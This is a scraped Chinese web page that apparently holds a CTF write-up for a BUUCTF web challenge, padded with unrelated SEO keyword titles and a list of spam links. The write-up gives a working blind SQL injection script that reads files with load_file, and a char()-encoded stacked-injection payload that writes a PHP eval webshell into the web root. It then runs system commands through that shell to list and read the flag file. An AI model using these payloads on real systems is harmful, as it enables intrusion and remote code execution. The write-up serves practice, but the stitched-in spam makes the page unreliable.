当前位置: 首页 > news >正文

爬虫做视频网站网站主页的布局方式

news 2025/9/18 6:44:33
爬虫做视频网站,网站主页的布局方式,网页设计动态页面,深圳企业馆设计公司打开界面,全部点击一遍,只有注册和登录功能可以使用注册一个账号,注册admin提示用户存在,可能有二次注入,注册admin自动加了一个字符,无法二次注入,点击其他功能点换浏览器重新登录后&#xff0…

打开界面,全部点击一遍,只有注册和登录功能可以使用

注册一个账号,注册admin提示用户存在,可能有二次注入,注册admin'

自动加了一个字符,无法二次注入,点击其他功能点

换浏览器重新登录后,各个功能点无法点击

  • 点击用户信息,当id=2,显示以下界面(将结合下面的文件上传利用)

测试id=1

显示如下界面

  • 点击编辑图片,看到有上传文件点(将结合上面的sql注入利用)

上传一个webshell看看

抓包进行绕过

修改一下后缀名,文件上传成功(虽然在bp绕过,后缀名还是为jpg)

上传点目前没啥用,从注入点进行操作,尝试读文件

import requests
cookies = {"PHPSESSID":"jiadkkr16f4o0spgp88tued137"
}
data='0x'
flag=''
r=requests.session()
for i in range(9999):for i in range(1,127):#print (i)url='http://9d09a1ad-3f91-41b5-9e7f-913c17681937.node4.buuoj.cn:81/user/user.php?id=0^(hex(load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870))<'+data+str(hex(i)).replace('0x','')+')'result=r.get(url=url,cookies=cookies).textif 'admin' in result:data+=str(hex(i-1)).replace('0x','')flag+=(chr(i-1))print (flag)break
print(data)

可以读/var/www/html/index.php文件,读取/var/www/html/user/user.php文件(这种方法跑十几分钟也跑不出来)

看了大佬的wp,得知在/var/www/html/user/user.php中是用mysqli_multi_query()函数进行sql语句查询

  • mysqli_multi_query() 执行的sql语句,其可以执行一个或多个针对数据库的查询,多个查询用分号进行分隔,也就存在堆叠注入。

已知存在注入点,且/favicon目录存在写权限,利用sql语句对目标目录写木马

存在各种限制,select,union,直接用char绕过(太菜,用其他绕过写马失败)

感觉以上不知道对做题影响不大,知道是堆叠注入和利用sql对目录写文件的思路就可以

原语句为

select ‘<?php eval($_POST[_]);?>’ into outfile ‘/var/www/html/favicon/shell.php’;

通过char及绕过的语句为

脚本如下:

str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str=len(str)
for i in range(0,len_str):if i == 0:print('char(%s'%ord(str[i]),end="")else:print(',%s'%ord(str[i]),end="")
print(')')
?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;

进行注入,页面显示webshell执行,对_参数进行传参

payload为

_=system('cd /;ls');

看到一个文件为WelL_Th1s_14_fl4g,去读取这个文件

payload为

_=system('cd /;cat WelL_Th1s_14_fl4g ');

得到flag

flag{1cc63c44-f1b0-40c0-a64e-fdc8bfe4f503} 删删改改四五回,哥们只是想混个勋章,太折磨人了,看到我文章有罗里吧嗦的地方见谅,我其他文章都是以精简为主,不在乎文章分数,为了这个勋章,我只好车轱辘话转来转去(这一段就是这个作用)

终于70分了,拿个女神勋章真难啊

http://www.yayakq.cn/news/871596/

相关文章:

  • 网站头部代码莆田市商城网站建设
  • 长春市网站制作公司口碑好的无锡网站建设
  • 网站建设策划书目录中小型网站建设讯息
  • 哪个网站做原创歌曲手表
  • 维度 网站建设汽车门户网站程序
  • 什么物流公司网站建设网页制作的模板代码
  • 网站接入网方式温州网上推广什么网站好
  • 苏州网站制作网站建设网站托管及维护
  • 给我一个免费网站吗供热设施网站搭建教程
  • 网站的空间与域名设计专业就业方向
  • 营销型网站的概念企业网站建设包括哪些
  • 网站建设佰金手指科杰十一天津建设工程信息网网
  • 网站修改思路四川建设厅电子证书官方网站
  • 建设银行昆山分行网站自己在线制作logo免费模版
  • 建设网站要点设计说明模版
  • 企业建设网站的步骤是什么意思oa系统简介
  • 低价网站建设南通网站建设计划书
  • 的网站建设公司网站运营目标
  • 苍南建设网站园林景观设计公司招聘
  • 网站国际网络备案号阳曲网站建设价格多少
  • 郑州个人网站建设公司排行榜泉州百度网站推广
  • 提供信息门户网站建设平面设计基础文章
  • 东莞定制网站建设希爱力的功效及副作用
  • 茌平网站建设公司手机模板网站模板下载网站有哪些
  • 广州专业做网站公司地方网站建设方案
  • 医疗网站建设策划书广东东莞自己建站教程
  • 现在宁波做网站网站设计与网页制作模板
  • 17网站一起做网店app聊城网站建设首选天成网络
  • 网站建设方面的书籍推荐做网站需要平台
  • 渭南做网站哪家公司百度怎么收录我的网站